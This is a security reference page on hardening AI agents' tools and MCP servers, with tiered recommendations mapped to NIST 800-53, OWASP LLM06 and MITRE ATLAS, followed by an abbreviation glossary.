Execution & Tools / Tools / MCP
FR EN

Execution & Tools

Tools / MCP

Tools and MCP servers: the external capabilities (APIs, functions, systems) the agent can call.

Plane
Execution & Tools
Flow steps
7
Frameworks
OWASP LLM06 · NIST 800-53 · MITRE ATLAS

Technology

Why use it

Give the agent concrete capabilities (read, write, call systems) in a standardized way (MCP).

Why it matters to security

Each tool widens the attack surface and the agent’s power: authentication, least privilege and I/O validation are mandatory.

Implementations Model Context Protocol (MCP)plugins / function callingtool gateways

Every tool given to an agent is a delegation of power: grant it sparingly.

Recommendations by maturity tier

Hover a recommendation for its explanation · each one carries its control number

Foundation

Minimum viable baseline
  • Tools authenticated with their own identity.
    NIST 800-53 IA-9
    A tool/MCP server authenticates; it is not implicitly trusted.
  • Least privilege per tool.
    NIST 800-53 AC-6OWASP LLM06:2025
    A tool gets only the scope its function needs.
  • Tool input and output validation.
    NIST 800-53 SI-10
    Tool parameters and results are untrusted.

Enterprise

Enterprise standard
  • Allow-list of approved tools and MCP servers.
    NIST 800-53 CM-7 · AC-3
    Only vetted tools are available to the agent.
  • Tool tokens with minimal scope and lifetime.
    NIST 800-53 AC-6 · IA-5
    A compromised tool has reduced power and window.
  • MCP server provenance verification.
    NIST 800-53 SR-4OWASP LLM03:2025
    A third-party MCP server is a supply-chain component.

Advanced

High-assurance / regulated
  • Tool-call authorization decided by the PDP.
    NIST 800-53 AC-24
    Access to a tool depends on context and risk.
  • Tool-abuse detection (frequency, sequence).
    NIST 800-53 SI-4
    Anomalous tool usage is flagged and contained.
  • Per-tool execution isolation.
    NIST 800-53 SC-39
    A compromised tool does not contaminate the others.

Architecture notes

  • Beware third-party MCP servers.details ▸
    A malicious tool can hijack the agent or exfiltrate its data.
    Validate their provenance, isolate their execution and strictly bound their scope.

References

OWASP LLM06:2025
Excessive Agency — tools are the direct vector of an agent’s power.
NIST SP 800-53 Rev5
IA-9, AC-6, AC-3, AC-24, SI-10, CM-7 (Least Functionality), SR-4, SC-39.
MITRE ATLAS — AML.T0051
Tool hijacking via prompt injection.

Abbreviations

PDP
Policy Decision Point
PEP
Policy Enforcement Point
PIP
Policy Information Point
PAP
Policy Administration Point
IdP
Identity Provider
TSS
Token Service
NHI
Non-Human Identity
RBAC
Role-Based Access Control
ABAC
Attribute-Based Access Control
MFA
Multi-Factor Authentication
HITL
Human-in-the-loop
JIT
Just-In-Time
CAE
Continuous Access Evaluation
CAEP
Continuous Access Evaluation Profile
DPoP
Demonstrating Proof-of-Possession
mTLS
mutual TLS
PII
Personally Identifiable Information
KMS
Key Management Service
CI/CD
Continuous Integration / Continuous Delivery
SIEM
Security Information and Event Management
SOAR
Security Orchestration, Automation and Response
SCIM
System for Cross-domain Identity Management
XACML
eXtensible Access Control Markup Language
OPA
Open Policy Agent
OWASP
Open Worldwide Application Security Project
NIST
National Institute of Standards and Technology
ATLAS
Adversarial Threat Landscape for Artificial-Intelligence Systems
LLM
Large Language Model
WAF
Web Application Firewall
CDN
Content Delivery Network
DDoS
Distributed Denial of Service
DLP
Data Loss Prevention
JWT
JSON Web Token
API
Application Programming Interface
CRS
Core Rule Set (OWASP)
RAG
Retrieval-Augmented Generation
MCP
Model Context Protocol
PBAC
Permission-Based Access Control
HSM
Hardware Security Module
UEBA
User and Entity Behavior Analytics
SBOM
Software Bill of Materials
SLSA
Supply-chain Levels for Software Artifacts
WORM
Write Once, Read Many
SPIFFE
Secure Production Identity Framework For Everyone